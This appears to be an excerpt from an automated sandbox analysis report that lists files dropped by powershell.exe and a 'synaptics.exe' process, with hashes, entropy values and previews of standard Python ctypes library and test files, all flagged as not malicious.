                                                                                                                                                                                                            Preview:o........b,dwH.......................@...s(...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.k.rJe.d.e.e.....e.j.d.k.rUd.d.l.m.Z...e.Z.e.j.d.k.rqe.j.d.k.rqe.e.....j...d...d.....d.k.rqe.Z.d.d.l.m.Z m!Z"m#Z$m%Z&..d}d.d...Z'd}d.d...Z(i.Z)d.d...Z*e.j.d.k.r.d.d.l.m+Z,..d.d.l.m-Z...i.Z/d.d...Z0e0j.r.e*j..1d.d...e0_.n.e.j.d.k.r.d.d.l.m2Z,..d.d.l.m3Z3m4Z4m5Z5m6Z6m7Z7..d.d.l.m8Z8m9Z9..d.d l.m:Z:..d}d!d"..Z;G.d#d$..d$e:..Z<e;e<d%....G.d&d'..d'e:..Z=e;e=....G.d(d)..d)e:..Z>e;e>....G.d*d+..d+e:..Z?e;e?....G.d,d-..d-e:..Z@e;e@....e.d...e.d/..k...r'e?ZAe@ZBn.G.d0d1..d1e:..ZAe;eA....G.d2d3..d3e:..ZBe;eB....G.d4d5..d5e:..ZCe;eC....G.d6d7..d7e:..ZDe;eD....G.d8d9..d9e:..ZEe3eE..e3eD..k...rjeDZEe.d/..e.d:..k...rxe?ZFe@ZGn.G.d;d<..d<e:..ZFe;eF....G.d=d>..d>e:..ZGe;eG....G.d?d@..d@e:..ZHeH..eH_IeH_Je;eH....G.dAdB..dBe:..ZKeK..eK_IeK_Je;eK....G.dCdD..dDe:..ZLeL..eL_IeL_Je;eL....G.dEdF..dFe:..ZMe;eMd%....G.dGdH..dHe:..ZNeNZO
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15906
                                                                                                                                                                                                            Entropy (8bit):5.335534775022113
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:JoMRQLVaCuKN1r9u1u2RTCQzweSkqxo5IbeX6EoV:JoMoVJ9u1d9wqpIbQBoV
                                                                                                                                                                                                            MD5:1454BEB191FEA587ACAB35A916F1E2E0
                                                                                                                                                                                                            SHA1:383E0DC5B97BBEC677B470D49F1E65F0ACA26F29
                                                                                                                                                                                                            SHA-256:D3E4F78D9D84E126B717963FCECA42DEEBE08C9290E657650887EA24DCD9B3E2
                                                                                                                                                                                                            SHA-512:88CECB7C8B07EAFF91B1539D28237DE8862205D97B0F14392809CA35A05BC6293C324787CBA785648BBDC8E35477A2D4B5BC8773BDE3890901FF86EB6A94F005
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dwH.......................@...s(...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.k.rJe.d.e.e.....e.j.d.k.rUd.d.l.m.Z...e.Z.e.j.d.k.rqe.j.d.k.rqe.e.....j...d...d.....d.k.rqe.Z.d.d.l.m.Z m!Z"m#Z$m%Z&..d}d.d...Z'd}d.d...Z(i.Z)d.d...Z*e.j.d.k.r.d.d.l.m+Z,..d.d.l.m-Z...i.Z/d.d...Z0e0j.r.e*j..1d.d...e0_.n.e.j.d.k.r.d.d.l.m2Z,..d.d.l.m3Z3m4Z4m5Z5m6Z6m7Z7..d.d.l.m8Z8m9Z9..d.d l.m:Z:..d}d!d"..Z;G.d#d$..d$e:..Z<e;e<d%....G.d&d'..d'e:..Z=e;e=....G.d(d)..d)e:..Z>e;e>....G.d*d+..d+e:..Z?e;e?....G.d,d-..d-e:..Z@e;e@....e.d...e.d/..k...r'e?ZAe@ZBn.G.d0d1..d1e:..ZAe;eA....G.d2d3..d3e:..ZBe;eB....G.d4d5..d5e:..ZCe;eC....G.d6d7..d7e:..ZDe;eD....G.d8d9..d9e:..ZEe3eE..e3eD..k...rjeDZEe.d/..e.d:..k...rxe?ZFe@ZGn.G.d;d<..d<e:..ZFe;eF....G.d=d>..d>e:..ZGe;eG....G.d?d@..d@e:..ZHeH..eH_IeH_Je;eH....G.dAdB..dBe:..ZKeK..eK_IeK_Je;eK....G.dCdD..dDe:..ZLeL..eL_IeL_Je;eL....G.dEdF..dFe:..ZMe;eMd%....G.dGdH..dHe:..ZNeNZO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1951
                                                                                                                                                                                                            Entropy (8bit):5.233288993791255
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:x7p1APBJ0tfAE4ZT26xn4rX4karuJ/AqKA1QRuAmVR5wq:r6r0OhZ/uLwyAqPQvmVj
                                                                                                                                                                                                            MD5:1310C7A28C03407A7C3529684C8CDCC1
                                                                                                                                                                                                            SHA1:342B2C916B3C61C5625E4F9EC10A130AD1560C3F
                                                                                                                                                                                                            SHA-256:9FC3D65951F6ED84B6412C0C6707D2322E157608EDC3E80CEFF59C3D2862333A
                                                                                                                                                                                                            SHA-512:126D7E09B3F94C355A5E8941772F81B34B3D86A9007DFC76CEDF4082CFEDCC37F0CA01FF8A0FB34CEBD133F93650CBF5ECF32253B60EFFB305DB7256269F1CEB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o........b,d.........................@...s....d.d.l.Z.d.d.l.T.e.e...Z.d.d...Z.G.d.d...d.e.e.....Z.e.j.d.k.r/d.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.j.d.k.rDd.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.d.....)......N)...*c....................C...sH...t.|.t...r.t.|.t...S.t.|.t...r.t.|.j...|.j...S.t.|.t...r.|.S.t.d.|.......).z.Return the type with the 'other' byte order. Simple types like. c_int and so on already have __ctype_be__ and __ctype_le__. attributes which contain the types, for more complicated types. arrays and structures are supported.. z+This type does not support other endian: %s)...hasattr.._OTHER_ENDIAN..getattr..isinstance.._array_type.._other_endian.._type_Z._length_..issubclass..Structure..TypeError)...typ..r.....WC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\ctypes\_endian.pyr........s..................r....c........................s....e.Z.d.Z...f.d.d...Z.....Z.S.)..._swapped_metac........................s^...|.d.k.r&g.}.|.D.].}.|.d...}.|.d...}.|.d
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1925
                                                                                                                                                                                                            Entropy (8bit):5.221834044888936
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lg7p1APBJ0tfAE4EBxn4rX4kbruu/fdq7RvRhPAEV5wq:S6r0OhiuLtV1qRoEV9
                                                                                                                                                                                                            MD5:994D869634ED8F17B756D85CDD2F0DAF
                                                                                                                                                                                                            SHA1:A90D6DF5C66740F3E5E448472FAF8310AEF26A09
                                                                                                                                                                                                            SHA-256:44D8A40A16B58891C3CAEE9222E974AE3497DE5218D9675EBEA7C3BE423054C7
                                                                                                                                                                                                            SHA-512:0BB4C96F1CE1FE7578D052822356138DF2DCAD86A9533E0E90F4133F9BF751A5D865EDD9CC8B81A7DB46948CF3E546274CE4A62333C442F648CF2AD26058FABC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.T.e.e...Z.d.d...Z.G.d.d...d.e.e.....Z.e.j.d.k.r/d.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.j.d.k.rDd.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.d.....)......N)...*c....................C...sH...t.|.t...r.t.|.t...S.t.|.t...r.t.|.j...|.j...S.t.|.t...r.|.S.t.d.|.......).z.Return the type with the 'other' byte order. Simple types like. c_int and so on already have __ctype_be__ and __ctype_le__. attributes which contain the types, for more complicated types. arrays and structures are supported.. z+This type does not support other endian: %s)...hasattr.._OTHER_ENDIAN..getattr..isinstance.._array_type.._other_endian.._type_Z._length_..issubclass..Structure..TypeError)...typ..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\ctypes\_endian.pyr........s..................r....c........................s....e.Z.d.Z...f.d.d...Z.....Z.S.)..._swapped_metac........................s^...|.d.k.r&g.}.|.D.].}.|.d...}.|.d...}.|.d.d.....}.|...|.t.|...f.|..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8362
                                                                                                                                                                                                            Entropy (8bit):5.4831056913983
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:y+G6UC0jDr473mk+gg3Fm1mGl7IsqzlNoDRi/HzNcjl:ylRZDk72DSmGJ8lNciHzNcJ
                                                                                                                                                                                                            MD5:403B9B43FF96B97773CCD267982FC2BE
                                                                                                                                                                                                            SHA1:3BBC320F6E3F0DBE4104A2C761DA70FC6981BA4E
                                                                                                                                                                                                            SHA-256:F4EB8DEAEE09B18ABDB364CE5DA8122BBF51660E882B732415818317E6505335
                                                                                                                                                                                                            SHA-512:83433924454D321064797E033B526A8B5A81E89E95CE4DF0D1AFD123A40356B6505BE5CDCF3F50DA7323A9D5188036BCE93D130E40D5D4FFC1F4A3C29F5CF836
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o........b,d.7.......................@...s@...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.d.k.r"d.d...Z.d.d...Z.d.d...Z.noe.j.d.k.r7e.j.d.k.r7d.d.l.m.Z...d.d...Z.nZe.j...d...rDd.d.l.m.Z...nMe.j.d.k.r.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.e.j.d.k.rcd.d...Z.n.d.d...Z.e.j...d...rvd.d...Z.d.d...Z.n.e.j.d.k.r.d.d...Z.d'd.d...Z.n.d.d ..Z.d!d"..Z.d#d...Z.d$d%..Z.e.d&k.r.e.....d.S.d.S.)(.....N..ntc....................C...s....d.}.t.j...|...}.|.d.k.r.d.S.|.t.|.....}.t.j.|.d.......d.d...\.}.}.t.|.d.d.......d...}.|.d.k.r3|.d.7.}.t.|.d.d.......d...}.|.d.k.rCd.}.|.d.k.rK|.|...S.d.S.).z.Return the version of MSVC that was used to build Python... For Python 2.3 and up, the version number is included in. sys.version. For earlier versions, assume the compiler is MSVC 6.. z.MSC v...........N.. .........................g......$@r....)...sys..version..find..len..split..int)...prefix..i..s..restZ.majorVersionZ.minorVersion..r.....TC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\li
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8336
                                                                                                                                                                                                            Entropy (8bit):5.4805616719126125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:7+G6fCXBDrl73zbXCL3mm0LGuZ7Iv0nwMXwDRi4qzDj:7lOiDp7Do0LGutnwMXExqzDj
                                                                                                                                                                                                            MD5:B1639BBF1BA37A93C5E52FA2983B7402
                                                                                                                                                                                                            SHA1:37FBD8493E2E27D8B024266FF4ECF54E765194B2
                                                                                                                                                                                                            SHA-256:BF748A82208787C943B58EA15930BD8F90DE2F3F3005755C589114CAB03BDC0D
                                                                                                                                                                                                            SHA-512:8FA28582A129128DA8A1B93019345E34B9710AEF6CECB11A59047B600D1A8E96685E38E7FDA4CA88EA0FA574A7ACE7A04BA73432E4E4F5FF06C8591B203FA8A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.7.......................@...s@...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.d.k.r"d.d...Z.d.d...Z.d.d...Z.noe.j.d.k.r7e.j.d.k.r7d.d.l.m.Z...d.d...Z.nZe.j...d...rDd.d.l.m.Z...nMe.j.d.k.r.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.e.j.d.k.rcd.d...Z.n.d.d...Z.e.j...d...rvd.d...Z.d.d...Z.n.e.j.d.k.r.d.d...Z.d'd.d...Z.n.d.d ..Z.d!d"..Z.d#d...Z.d$d%..Z.e.d&k.r.e.....d.S.d.S.)(.....N..ntc....................C...s....d.}.t.j...|...}.|.d.k.r.d.S.|.t.|.....}.t.j.|.d.......d.d...\.}.}.t.|.d.d.......d...}.|.d.k.r3|.d.7.}.t.|.d.d.......d...}.|.d.k.rCd.}.|.d.k.rK|.|...S.d.S.).z.Return the version of MSVC that was used to build Python... For Python 2.3 and up, the version number is included in. sys.version. For earlier versions, assume the compiler is MSVC 6.. z.MSC v...........N.. .........................g......$@r....)...sys..version..find..len..split..int)...prefix..i..s..restZ.majorVersionZ.minorVersion..r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\ctypes\util.py.._get_bui
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4908
                                                                                                                                                                                                            Entropy (8bit):5.556961611192445
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:6n7SgQvVTrUEc2DHBXCmw8eOXf97EOVY1HWyGPzYPrVgICEROhOFPN:6n6VTAEc2DHBX28ZX5EOVY1HWxSc2N
                                                                                                                                                                                                            MD5:97D3A02D61EF9EE0AE5D70C1BA1E600E
                                                                                                                                                                                                            SHA1:FB2701F460E22349DC9F2A6388DF54725F5EFD86
                                                                                                                                                                                                            SHA-256:050ED3102FFCCA199A50625BEF7592FF149857AA11988593ED22B77EAB1F3813
                                                                                                                                                                                                            SHA-512:3F8B49C58A05CE2EDF0F354BA6D33D9C375C9F6EE0208D1DD26BEF43991F2051F5799E1380C96C96F8E1B9FA85ABA8278DF61CB75EA5EC8CC2664CB77E701D50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o........b,d.........................@...s....d.d.l.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j...Z.Z.e.j ..Z!Z"e.j#..Z$..Z%Z&e.j#..Z'Z(e.j)..Z*Z+e.j,..Z-Z.e../e.j...e../e.j,..k.rle.j.Z0e.j.Z1n.e../e.j...e../e.j,..k.r~e.j Z0e.j.Z1e.Z2e.Z3e.Z4e.Z5e.Z6e.Z7e.j,Z8e8Z9e8Z:e8Z;e8Z<e8Z=e8Z>e8Z?e8Z@e8ZAe8ZBe8ZCe8ZDe8ZEe8ZFe8ZGe8ZHe8ZIe8ZJe8ZKe8ZLe8ZMe8ZNe8ZOe8ZPe8ZQe8ZRe8ZSe8ZTe8ZUe8ZVe8ZWG.d.d...d.e.jX..ZYeY..ZZ..Z[Z\G.d.d...d.e.jX..Z]e]Z^G.d.d...d.e.jX..Z_G.d.d...d.e.jX..Z`e`..Za..ZbZcG.d.d...d.e.jX..Zded..ZeZfd.d...ZgG.d.d...d.e.jX..ZhehZiG.d.d...d.e.jX..ZjejZkd.ZlG.d.d...d.e.jX..ZmG.d.d...d.e.jX..Zne..oe.....ZpZqe..oe...Zre..oe.....ZsZte..oe...Zue..oe4..Zve..oe.....ZwZxe..oeh....ZyZze..oe...Z{e..oe8....Z|Z}e..oeG..Z~e..oeH..Z.e..oe.....Z.Z.e..oe...Z.e..oe7..Z.e..oe.....Z.Z.e..oej....Z.Z.e..oe`....Z.Z.e..oec..Z.e..oeY....Z.Z.e..oe\....Z.Z.e..oeV..Z.e..oe...Z.e..oed....Z.Z.e..oef....Z.Z.e..oe^..Z.e..oe.....Z.Z.e..oe"..Z.e..o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4882
                                                                                                                                                                                                            Entropy (8bit):5.54561054170433
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9n7SgQvVTrUEb2DHdwyeOXd97wUah1VWyGPTYPrVgI+AxROhOFPN:9n6VTAEb2DH+yZXjw7h1VWJSZe2N
                                                                                                                                                                                                            MD5:1CCBD457E86A4BA8D9DBBBDA295BDEFD
                                                                                                                                                                                                            SHA1:CA0CE475D546FB79D774E578438F38E4F838E829
                                                                                                                                                                                                            SHA-256:1131DE1922112F686BF7174C8882F1F7BAC2C5E1B2DC1C8CC5B72299CDCF65BB
                                                                                                                                                                                                            SHA-512:06ED33CFF591F51C36D8EC536F2F51E8350C37F79038BF735B043606695AFE6E053191B8F857714285E03665C5BB1D68FDCCA349742E13E30C30A1916592189A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j...Z.Z.e.j ..Z!Z"e.j#..Z$..Z%Z&e.j#..Z'Z(e.j)..Z*Z+e.j,..Z-Z.e../e.j...e../e.j,..k.rle.j.Z0e.j.Z1n.e../e.j...e../e.j,..k.r~e.j Z0e.j.Z1e.Z2e.Z3e.Z4e.Z5e.Z6e.Z7e.j,Z8e8Z9e8Z:e8Z;e8Z<e8Z=e8Z>e8Z?e8Z@e8ZAe8ZBe8ZCe8ZDe8ZEe8ZFe8ZGe8ZHe8ZIe8ZJe8ZKe8ZLe8ZMe8ZNe8ZOe8ZPe8ZQe8ZRe8ZSe8ZTe8ZUe8ZVe8ZWG.d.d...d.e.jX..ZYeY..ZZ..Z[Z\G.d.d...d.e.jX..Z]e]Z^G.d.d...d.e.jX..Z_G.d.d...d.e.jX..Z`e`..Za..ZbZcG.d.d...d.e.jX..Zded..ZeZfd.d...ZgG.d.d...d.e.jX..ZhehZiG.d.d...d.e.jX..ZjejZkd.ZlG.d.d...d.e.jX..ZmG.d.d...d.e.jX..Zne..oe.....ZpZqe..oe...Zre..oe.....ZsZte..oe...Zue..oe4..Zve..oe.....ZwZxe..oeh....ZyZze..oe...Z{e..oe8....Z|Z}e..oeG..Z~e..oeH..Z.e..oe.....Z.Z.e..oe...Z.e..oe7..Z.e..oe.....Z.Z.e..oej....Z.Z.e..oe`....Z.Z.e..oec..Z.e..oeY....Z.Z.e..oe\....Z.Z.e..oeV..Z.e..oe...Z.e..oed....Z.Z.e..oef....Z.Z.e..oe^..Z.e..oe.....Z.Z.e..oe"..Z.e..o
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12906
                                                                                                                                                                                                            Entropy (8bit):4.709051951016039
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:6u9ZuBRuVbIHqmh3Ahi9Dl9tUTBkqCYDS4ZK7TZUzvMsHpHs6NCir99b/wtpvB:6uvu/uJOhwhih9mlbUlwvMKHFJn/W7
                                                                                                                                                                                                            MD5:0BF271057C0AE3E6EEA6AE43DCDF8B78
                                                                                                                                                                                                            SHA1:556079CF59F04455C5FF64EAD5E0997A3E950E50
                                                                                                                                                                                                            SHA-256:8DCEFABF8101D7ED0A90AD3325AC10BED792580A0FCE71938A4B3106B8FA3FBE
                                                                                                                                                                                                            SHA-512:708E13CE7C9FBF71518F98386558FFCC9862CA37A36637E4CFD9BB4BB492CEA052F9D75457A4366EF6359D8E22BB2265D3AD0BCA648204DB8748D9184FA9174A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""..Lib/ctypes.util.find_library() support for AIX..Similar approach as done for Darwin support by using separate files..but unlike Darwin - no extension such as ctypes.macholib.*....dlopen() is an interface to AIX initAndLoad() - primary documentation at:..https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm..https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm....AIX supports two styles for dlopen(): svr4 (System V Release 4) which is common on posix..platforms, but also a BSD style - aka SVR3.....From AIX 5.3 Difference Addendum (December 2004)..2.9 SVR4 linking affinity..Nowadays, there are two major object file formats used by the operating systems:..XCOFF: The COFF enhanced by IBM and others. The original COFF (Common..Object File Format) was the base of SVR3 and BSD 4.2 systems...ELF: Executable and Linking Format that was developed by AT&T and is a..base for SVR4 UNIX.....While the shared library content
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2061
                                                                                                                                                                                                            Entropy (8bit):4.642554806419105
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:kFppFNPBJ5MJKZuf7HVUGsHYVjw10IiFQ/oil:kFpHNr5+uMjw1Piqwil
                                                                                                                                                                                                            MD5:017E36585911B8E46B02B637521E5B5C
                                                                                                                                                                                                            SHA1:73363C9FF4BDFB489732376832B1F450645E21C7
                                                                                                                                                                                                            SHA-256:48ACC287ECDEB183631CABF97DF977AF3F05E081FCE79A53C35B6078561F7C50
                                                                                                                                                                                                            SHA-512:7E4361B80483CD32E88A6C07A1F4310AA4AFF7857045D0879A6CB25C56F7E4C6DE62017F7EAC40B12EA67D94A2EF0FCDCAC20C14EB2B22BC3A298BF35E5AEEC1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import sys..from ctypes import *...._array_type = type(Array)....def _other_endian(typ):.. """Return the type with the 'other' byte order. Simple types like.. c_int and so on already have __ctype_be__ and __ctype_le__.. attributes which contain the types, for more complicated types.. arrays and structures are supported... """.. # check _OTHER_ENDIAN attribute (present if typ is primitive type).. if hasattr(typ, _OTHER_ENDIAN):.. return getattr(typ, _OTHER_ENDIAN).. # if typ is array.. if isinstance(typ, _array_type):.. return _other_endian(typ._type_) * typ._length_.. # if typ is structure.. if issubclass(typ, Structure):.. return typ.. raise TypeError("This type does not support other endian: %s" % typ)....class _swapped_meta(type(Structure)):.. def __setattr__(self, attrname, value):.. if attrname == "_fields_":.. fields = [].. for desc in value:.. name = desc[0]..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):461
                                                                                                                                                                                                            Entropy (8bit):4.546124893741369
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:5R8x5ZRpH6wGrhDAI9x2GJEVX6UlJTVGylg9weT:5WrhShDAK2WEkGJT0jf
                                                                                                                                                                                                            MD5:82611F2C799ACE4BAD58A6E89CE5B0D9
                                                                                                                                                                                                            SHA1:296591D4A8C033DAC5EF3FAB0F475884C7174F85
                                                                                                                                                                                                            SHA-256:9CC3DA0531E291012C8265313E60C63A5E4698FAF1551DC1D1F73953E4F70699
                                                                                                                                                                                                            SHA-512:09E5106F04CA697ADE0D646AFD69A4FFA6B6762EF1105D4F8D060ADA4BCABF2F8665F4B414AFED8690E223487C30C139AA4A4BF6C841DEA568B808A6C221B8F3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import os..import unittest..from test import support..from test.support import import_helper......# skip tests if _ctypes was not built..ctypes = import_helper.import_module('ctypes')..ctypes_symbols = dir(ctypes)....def need_symbol(name):.. return unittest.skipUnless(name in ctypes_symbols,.. '{!r} is required'.format(name))....def load_tests(*args):.. return support.load_package_tests(os.path.dirname(__file__), *args)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                            Entropy (8bit):4.1268772959489075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1GelAW3KBmo6LShh9QLM3z6RNMy:1HAtKkQLMSMy
                                                                                                                                                                                                            MD5:5257F93F9DB3817B3834209486F556E7
                                                                                                                                                                                                            SHA1:BF5B021DFA64416EB28154BE5E91CAEFB764303A
                                                                                                                                                                                                            SHA-256:DDE5CFCC88B23F92A41180A582C18CFD8CE2AFADD12B0F6780630F5EE699A6F1
                                                                                                                                                                                                            SHA-512:D2E43B2319E562ED5E95EB627C7912469B844714EB553B0262205C774A4AC3538AB4B1C2CB34C2402A3584D9BB138805A0138B8AC151AA8CE79F96D8A733038A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:from ctypes.test import load_tests..import unittest....unittest.main()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9765
                                                                                                                                                                                                            Entropy (8bit):4.622937915186651
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:yqwz7ys+2IF/eZQbr9MmKVwciXNEi1Ai0PYNCCNDn19cllxkymksvlg1p4De0QTq:IH+2INKwci7H0QciE8y0g1aKTTq
                                                                                                                                                                                                            MD5:3E6B1F472B29A6EBF36EB149460F84B6
                                                                                                                                                                                                            SHA1:ACB83DFB4DB631943C411A9955C8AA952BC2FF97
                                                                                                                                                                                                            SHA-256:CE56D0574523CE5416D09AA77B6F5441E7F2D8B3C6C4E9EED267C97B5CF06839
                                                                                                                                                                                                            SHA-512:D15756407F9C3B7498F4E85408B321540A6B317E436A2E47B4D34104F27DA6B4431E9C51C93D99FEAFE4C0E2C83712366595A9EB146402B8DC961911FBAAF6A7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:from ctypes import *..import unittest..import struct....def valid_ranges(*types):.. # given a sequence of numeric types, collect their _type_.. # attribute, which is a single format character compatible with.. # the struct module, use the struct module to calculate the.. # minimum and maximum value allowed for this format... # Returns a list of (min, max) values... result = [].. for t in types:.. fmt = t._type_.. size = struct.calcsize(fmt).. a = struct.unpack(fmt, (b"\x00"*32)[:size])[0].. b = struct.unpack(fmt, (b"\xFF"*32)[:size])[0].. c = struct.unpack(fmt, (b"\x7F"+b"\x00"*32)[:size])[0].. d = struct.unpack(fmt, (b"\x80"+b"\xFF"*32)[:size])[0].. result.append((min(a, b, c, d), max(a, b, c, d))).. return result....ArgType = type(byref(c_int(0)))....unsigned_types = [c_ubyte, c_ushort, c_uint, c_ulong]..signed_types = [c_byte, c_short, c_int, c_long, c_longlong]....bool_types = []....float_types = [c_double, c_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1744
                                                                                                                                                                                                            Entropy (8bit):4.939764620789078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:0GHL4EGxtgeRl33ejGPi79YeC78azJ17ar:vKNJXi71Pa1JE
                                                                                                                                                                                                            MD5:01973E3980CDA772074468BBBF73575D
                                                                                                                                                                                                            SHA1:D6CD1706035ED5AAC28B49DD383309D85ED8B66D
                                                                                                                                                                                                            SHA-256:2375BFD846D3F8C50E6ECF87DD4F46A46E8CDABB02CF826FA1B61EF524824554
                                                                                                                                                                                                            SHA-512:5461CF969FB747D918D40CB42B2AABACC59A0287D27308F15F97E4D898EC929659BE10BC69B1F88E1176C3E549A55F467E07A3BFE63996F6C297BE2712F82BEA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
